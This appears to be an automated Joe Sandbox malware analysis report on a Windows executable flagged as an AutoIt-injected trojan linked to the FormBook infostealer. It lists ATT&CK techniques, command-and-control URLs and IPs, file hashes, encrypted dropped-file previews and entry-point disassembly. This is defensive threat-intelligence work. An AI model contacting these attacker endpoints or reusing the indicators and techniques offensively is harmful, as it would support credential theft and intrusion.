Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
psibx9rXra.exe	68%	ReversingLabs	Win32.Trojan.AutoitInject
psibx9rXra.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.shanhaiguan.net	0%	Avira URL Cloud	safe
http://www.shanhaiguan.net/pjwm/?bxDtSjJ8=8dO1aKrXjPlkXvyCnyLGa4pnRyHZl/5Glqi2qmOCi9JNoYrB/H/4K5GJx7Vk3aBG8ot0fyIE2s8PLQIeBQda8ynm0peoT5yaFK2JmAGmcsEs6JHRTdV3uPo4ApQ0nSHi8A1Y4Yw=&zj=orBTgZEhYzzl76	0%	Avira URL Cloud	safe
http://www.shanhaiguan.net/pjwm/	0%	Avira URL Cloud	safe
http://www.yu35n.top/k4q2/?bxDtSjJ8=LBQI05KptpfuDcZW7JoIpuF74BnNKfAu333BOVzeV95OEtTp/i4HGB65IJHwn48sc6noL6ZERte3tTxWC6Id5pYWrwAdGl9yxaqIHeQzu/Ta2AAfF3von29M/1uaALX4Ci+P/fk=&zj=orBTgZEhYzzl76	0%	Avira URL Cloud	safe
http://www.easestore.shop/0uas/?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9ojRQ7K5i+hNgB3lCh6TNQwIH2qK1aJmzOxGvULLN47dZXmS7DKEcomGl93d/9sBop2npa8gzI/odg=&zj=orBTgZEhYzzl76	0%	Avira URL Cloud	safe
http://www.moritynomxd.xyz/o5i7/	0%	Avira URL Cloud	safe
http://www.moritynomxd.xyz/o5i7/?bxDtSjJ8=UzQqnnXvSc3Mr+9QcvCsHMvIJtyRJ1aQrLi0DBTwMAPqBtFAVrqfkCNp/R9/sDvSPASnyWuFHZLa9XQnO8xSKQTT8XEJ9CJbgwDafhDT3FMBtYtvONQCjms9TNvshXbs6vmRQiM=&zj=orBTgZEhYzzl76	0%	Avira URL Cloud	safe
https://www.easestore.shop/0uas?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9o	0%	Avira URL Cloud	safe
http://www.yu35n.top/k4q2/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
yu35n.top	154.23.178.183	true	false	unknown
wearenotgoingback.info	76.223.105.230	true	false	unknown
shops.myshopify.com	23.227.38.74	true	false	high
www.moritynomxd.xyz	45.158.77.253	true	true	unknown
www.shanhaiguan.net	156.242.132.82	true	false	unknown
www.wearenotgoingback.info	unknown	unknown	true	unknown
www.yu35n.top	unknown	unknown	true	unknown
www.easestore.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.moritynomxd.xyz/o5i7/?bxDtSjJ8=UzQqnnXvSc3Mr+9QcvCsHMvIJtyRJ1aQrLi0DBTwMAPqBtFAVrqfkCNp/R9/sDvSPASnyWuFHZLa9XQnO8xSKQTT8XEJ9CJbgwDafhDT3FMBtYtvONQCjms9TNvshXbs6vmRQiM=&zj=orBTgZEhYzzl76	false	Avira URL Cloud: safe	unknown
http://www.moritynomxd.xyz/o5i7/	false	Avira URL Cloud: safe	unknown
http://www.yu35n.top/k4q2/	false	Avira URL Cloud: safe	unknown
http://www.yu35n.top/k4q2/?bxDtSjJ8=LBQI05KptpfuDcZW7JoIpuF74BnNKfAu333BOVzeV95OEtTp/i4HGB65IJHwn48sc6noL6ZERte3tTxWC6Id5pYWrwAdGl9yxaqIHeQzu/Ta2AAfF3von29M/1uaALX4Ci+P/fk=&zj=orBTgZEhYzzl76	false	Avira URL Cloud: safe	unknown
http://www.shanhaiguan.net/pjwm/	false	Avira URL Cloud: safe	unknown
http://www.shanhaiguan.net/pjwm/?bxDtSjJ8=8dO1aKrXjPlkXvyCnyLGa4pnRyHZl/5Glqi2qmOCi9JNoYrB/H/4K5GJx7Vk3aBG8ot0fyIE2s8PLQIeBQda8ynm0peoT5yaFK2JmAGmcsEs6JHRTdV3uPo4ApQ0nSHi8A1Y4Yw=&zj=orBTgZEhYzzl76	false	Avira URL Cloud: safe	unknown
http://www.easestore.shop/0uas/?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9ojRQ7K5i+hNgB3lCh6TNQwIH2qK1aJmzOxGvULLN47dZXmS7DKEcomGl93d/9sBop2npa8gzI/odg=&zj=orBTgZEhYzzl76	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.shanhaiguan.net	GFwdSeXZEVUZM.exe, 00000007.00000002.3457739749.0000000005587000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.easestore.shop/0uas?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9o	newdev.exe, 00000005.00000002.3458200823.0000000005D14000.00000004.10000000.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3456345871.00000000034E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2859106138.00000000377D4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	newdev.exe, 00000005.00000003.2749445709.000000000833D000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
156.242.132.82	www.shanhaiguan.net	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
45.158.77.253	www.moritynomxd.xyz	United Kingdom	60917	TEDRATEDRABACKBONEES	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	false
154.23.178.183	yu35n.top	United States	174	COGENT-174US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587985
Start date and time:	2025-01-10 20:07:51 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	psibx9rXra.exe renamed because original name is a hash value
Original Sample Name:	29c036ae5258e869815a3be9b7ebdab701f69f575796555c52d9eb76c2735217.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@5/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 84% Number of executed functions: 48 Number of non-executed functions: 278
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.253.45, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
VT rate limit hit for: psibx9rXra.exe

Simulations

Behavior and APIs

Time	Type	Description
14:10:02	API Interceptor	1402350x Sleep call for process: newdev.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
156.242.132.82	xBzBOQwywT.exe	Get hash	malicious	FormBook	Browse	www.shanhaiguan.net/b6g5/
	N2Qncau2rN.exe	Get hash	malicious	FormBook	Browse	www.shanhaiguan.net/b6g5/
	PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	www.shanhaiguan.net/p2q3/
	NVOICE FOR THE MONTH OF AUG-24.exe	Get hash	malicious	FormBook	Browse	www.shanhaiguan.net/p2q3/
	DEBIT NOTE 01ST SEP 2024.exe	Get hash	malicious	FormBook	Browse	www.shanhaiguan.net/p2q3/
	PROFOMA INVOICE SHEET.exe	Get hash	malicious	FormBook	Browse	www.shanhaiguan.net/p2q3/
23.227.38.74	236236236.elf	Get hash	malicious	Unknown	Browse	lennon.greengoohelps.com/
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.domon.com/
	sa7Bw41TUq.exe	Get hash	malicious	FormBook	Browse	www.zingara.life/s7qk/
	ImBm40hNZ2.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.cannulafactory.top/y82c/
	8EhMjL3yNF.exe	Get hash	malicious	FormBook	Browse	www.zingara.life/c0mi/
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.zingara.life/s7qk/
	payment copy.exe	Get hash	malicious	FormBook	Browse	www.zingara.life/s7qk/
	ORDER ENQUIRY.exe	Get hash	malicious	FormBook	Browse	www.wergol.com/hy08/?GxlX=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cM7klw0Rkk8&DVRXbd=tXIxBhEhlzJLR
	ORDER_1105-19-24-3537.pdf.exe	Get hash	malicious	FormBook	Browse	www.day2go.net/rn94/?jDHh=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&9r9Hc=ytxTjD5hRxA
	Specification and Quantity Pdf.exe	Get hash	malicious	FormBook	Browse	www.tuktukwines.com/n7ak/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.moritynomxd.xyz	wavjjT3sEq.exe	Get hash	malicious	FormBook	Browse	172.81.61.224
	UNGSno5k4G.exe	Get hash	malicious	FormBook	Browse	172.81.61.224
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	172.81.61.224
	Order.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.81.61.224
	POPO00003964.exe	Get hash	malicious	FormBook	Browse	172.81.61.224
	YSjOEAta07.exe	Get hash	malicious	FormBook	Browse	172.81.61.224
	Arrival notice.exe	Get hash	malicious	FormBook	Browse	172.81.61.224
	List of Items0001.doc.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.81.61.224
	PO2024033194.exe	Get hash	malicious	FormBook	Browse	172.81.61.224
	ncOLm62YLB.exe	Get hash	malicious	FormBook	Browse	172.81.61.224
shops.myshopify.com	https://keycaptoys.com/	Get hash	malicious	Unknown	Browse	23.227.38.74
	L4rN4tX0aH.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	https://summerfieldfarms.com/	Get hash	malicious	Unknown	Browse	23.227.38.74
	https://ambir.com/ambir-card-scanners/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.227.38.74
	https://sewing-ladyltd.myshopify.com/sol?syclid=365862d9-5d6e-4a94-b401-31f50f547182	Get hash	malicious	Unknown	Browse	23.227.38.74
	De_posit Confirmati0n_ Mitie.html	Get hash	malicious	Unknown	Browse	23.227.38.74
	https://app.bitdam.com/api/v1.0/links/rewrite_click/?rewrite_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyZXdyaXRlX2lkIjoiNjcyOGQ2YzliOTFmMDRhNDE1NjM3NTRhIiwidXJsIjoiIiwib3JnYW5pemF0aW9uX2lkIjo1ODQwfQ.Uhd2nS1gN1sUzvqpPDTmoAH1ZU9vF-hNz1sM06cv-iA&url=https%3A//www.google.it/url%3Fq%3Dhttps%3A//www.google.it/url%3Fq%3Dhttps%3A//www.google.it/url%3Fq%3Dhttps%3A//www.google.ro/url%3Fq%3Dhttps%3A//www.google.nl/url%3Fq%3DZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%6E%65%77%68%6F%6D%65%73%76%6E%2E%63%6F%6D%2F%63%67%69%2F/3we/Y29saW4uZ3JhbnRAZmlyc3RvbnRhcmlvLmNvbQ==	Get hash	malicious	Unknown	Browse	23.227.38.74
	+1-481-481-XXX_audio.wa.html	Get hash	malicious	Unknown	Browse	23.227.38.74
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	23.227.38.74
	https://www.google.com.sg/url?q=p8v7jruqDC0s&rct=p8v7jruqDC0s&sa=t&esrc=p8v7jruqDC0s&source=&cd=p8v7jruqDC0s&uact=&url=amp%2Famandotuvoz.org/service/jkbhwfdhjkng/frederic.delesalle@treezor.com	Get hash	malicious	HTMLPhisher	Browse	23.227.38.74

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	156.251.17.224
	cbot.exe	Get hash	malicious	Unknown	Browse	154.213.192.42
	cbot.exe	Get hash	malicious	Unknown	Browse	154.213.192.42
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	154.213.39.66
	armv4l.elf	Get hash	malicious	Unknown	Browse	156.253.200.172
	https://199.188.109.181	Get hash	malicious	Unknown	Browse	154.203.26.164
	Fantazy.m68k.elf	Get hash	malicious	Unknown	Browse	156.243.249.53
	sora.arm7.elf	Get hash	malicious	Unknown	Browse	154.216.35.228
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	gompsl.elf	Get hash	malicious	Mirai	Browse	156.251.7.182
CLOUDFLARENETUS	invoice_AG60538.pdf	Get hash	malicious	Unknown	Browse	172.64.41.3
	CvzLvta2bG.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	104.21.7.187
	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	Message 2.eml	Get hash	malicious	Unknown	Browse	172.64.41.3
	FPACcnxAUT.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	jxy62Zm6c4.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	104.23.145.230
	Message.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	s2Jg1MAahY.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
TEDRATEDRABACKBONEES	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	45.159.66.123
	Josho.arm7.elf	Get hash	malicious	Mirai	Browse	45.159.66.188
	na.elf	Get hash	malicious	Mirai	Browse	45.159.66.169
	na.elf	Get hash	malicious	Mirai	Browse	45.159.66.169
	na.elf	Get hash	malicious	Mirai	Browse	45.159.66.169
	na.elf	Get hash	malicious	Mirai	Browse	45.159.66.169
	na.elf	Get hash	malicious	Mirai	Browse	45.159.66.169
	na.elf	Get hash	malicious	Mirai	Browse	45.159.66.169
	na.elf	Get hash	malicious	Mirai	Browse	45.159.66.169
	na.elf	Get hash	malicious	Mirai	Browse	45.159.66.169
COGENT-174US	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	38.181.21.178
	pKXxiawkTj.exe	Get hash	malicious	XWorm	Browse	154.39.0.150
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	154.62.137.46
	frosty.spc.elf	Get hash	malicious	Mirai	Browse	38.148.77.12
	frosty.sh4.elf	Get hash	malicious	Mirai	Browse	23.154.10.225
	cNDddMAF5u.exe	Get hash	malicious	FormBook	Browse	154.23.178.231
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	38.181.21.54
	https://sign-as.allarknow.online/	Get hash	malicious	Unknown	Browse	50.7.127.10
	http://pdfdrive.com.co	Get hash	malicious	Unknown	Browse	143.244.56.53
	https://www.cineuserdad.ec	Get hash	malicious	Unknown	Browse	50.7.24.35

Process:	C:\Windows\SysWOW64\newdev.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut81AB.tmp

Download File

Process:	C:\Users\user\Desktop\psibx9rXra.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.994941364645655
Encrypted:	true
SSDEEP:	6144:mQU9CwCX0rbFKR9fApwkpJRsU3XJ6qw9X9bdjEW2ksz:mQmn/UR9Wbpvh3XJ/w6ssz
MD5:	4542E9AAE94A1B5CE9E26E1F0252BB3E
SHA1:	66D46FBA6DF7AD0ADBB52D4BD6B567F53AABEC54
SHA-256:	048F4E444F3D4081A0E2EF2FDA1A12F76C3D94ACA0F2F96474C70501A53FFD22
SHA-512:	D88C4367133B5AE934AA974DAC37213A8E706BDA7935E56D40037EEA51AB80C2D6D4FF70B6BD806B506D21A1BFF32C3A90284254705EB808C1ED0A51720055D1
Malicious:	false
Reputation:	low
Preview:	..}..1ELM..F....8O..g@I...8OQ1ELMVEJOQHGK468LUWUOCABEZ8O.1ELCI.DO.A.j.7t.t.=&0a275_=0\e/,8+%;q"kFCVl<9u...b(5\.<HFiVEJOQHG25?.q50.r#&.x:_.K..w6".U..wTQ.V...s#&..3['lQ".MVEJOQHG.q68.TVU..C.EZ8OQ1EL.VGKDPCGK`28LUWUOCAB.N8OQ!ELM&AJOQ.GK$68LWWUICABEZ8OW1ELMVEJO!LGK668LUWUMC..EZ(OQ!ELMVUJOAHGK468\UWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJa%-??4688.SUOSABE.<OQ!ELMVEJOQHGK468lUW5OCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468

C:\Users\user\AppData\Local\Temp\uppishly

Download File

Process:	C:\Users\user\Desktop\psibx9rXra.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.994941364645655
Encrypted:	true
SSDEEP:	6144:mQU9CwCX0rbFKR9fApwkpJRsU3XJ6qw9X9bdjEW2ksz:mQmn/UR9Wbpvh3XJ/w6ssz
MD5:	4542E9AAE94A1B5CE9E26E1F0252BB3E
SHA1:	66D46FBA6DF7AD0ADBB52D4BD6B567F53AABEC54
SHA-256:	048F4E444F3D4081A0E2EF2FDA1A12F76C3D94ACA0F2F96474C70501A53FFD22
SHA-512:	D88C4367133B5AE934AA974DAC37213A8E706BDA7935E56D40037EEA51AB80C2D6D4FF70B6BD806B506D21A1BFF32C3A90284254705EB808C1ED0A51720055D1
Malicious:	false
Reputation:	low
Preview:	..}..1ELM..F....8O..g@I...8OQ1ELMVEJOQHGK468LUWUOCABEZ8O.1ELCI.DO.A.j.7t.t.=&0a275_=0\e/,8+%;q"kFCVl<9u...b(5\.<HFiVEJOQHG25?.q50.r#&.x:_.K..w6".U..wTQ.V...s#&..3['lQ".MVEJOQHG.q68.TVU..C.EZ8OQ1EL.VGKDPCGK`28LUWUOCAB.N8OQ!ELM&AJOQ.GK$68LWWUICABEZ8OW1ELMVEJO!LGK668LUWUMC..EZ(OQ!ELMVUJOAHGK468\UWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJa%-??4688.SUOSABE.<OQ!ELMVEJOQHGK468lUW5OCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468LUWUOCABEZ8OQ1ELMVEJOQHGK468

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.921856383155438
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	psibx9rXra.exe
File size:	1'365'504 bytes
MD5:	df44b0a1b0208d51ee82419a7c9fdf47
SHA1:	401684aa7cec54ac1124b8fb92cc5bb510668608
SHA256:	29c036ae5258e869815a3be9b7ebdab701f69f575796555c52d9eb76c2735217
SHA512:	24710fbdc030db07cc13b7ea111ca8ec91c97780a4f3c0796d252f43f640141d5c3025f13e7df80006e0b22102169413965a671b84aaa38d58e3851667c94ec3
SSDEEP:	24576:Ru6J33O0c+JY5UZ+XC0kGso6FaZRlW206/SLs0eTVvWY:Du0c++OCvkGs9FaZW6aLcoY
TLSH:	6855AD2363DD8363CB669173BA6967016EBB7C230930F8571F843D7AA9701E1162D6B3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	09329252ca8d344b

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675F6E2D [Mon Dec 16 00:02:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F8800CBC76Ah
jmp 00007F8800CAF534h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F8800CAF6BAh
cmp edi, eax
jc 00007F8800CAFA1Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F8800CAF6B9h
rep movsb
jmp 00007F8800CAF9CCh
cmp ecx, 00000080h
jc 00007F8800CAF884h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F8800CAF6C0h
bt dword ptr [004BE324h], 01h
jc 00007F8800CAFB90h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F8800CAF85Dh
test edi, 00000003h
jne 00007F8800CAF86Eh
test esi, 00000003h
jne 00007F8800CAF84Dh
bt edi, 02h
jnc 00007F8800CAF6BFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F8800CAF6C3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F8800CAF715h
bt esi, 03h
jnc 00007F8800CAF768h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x84c70	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
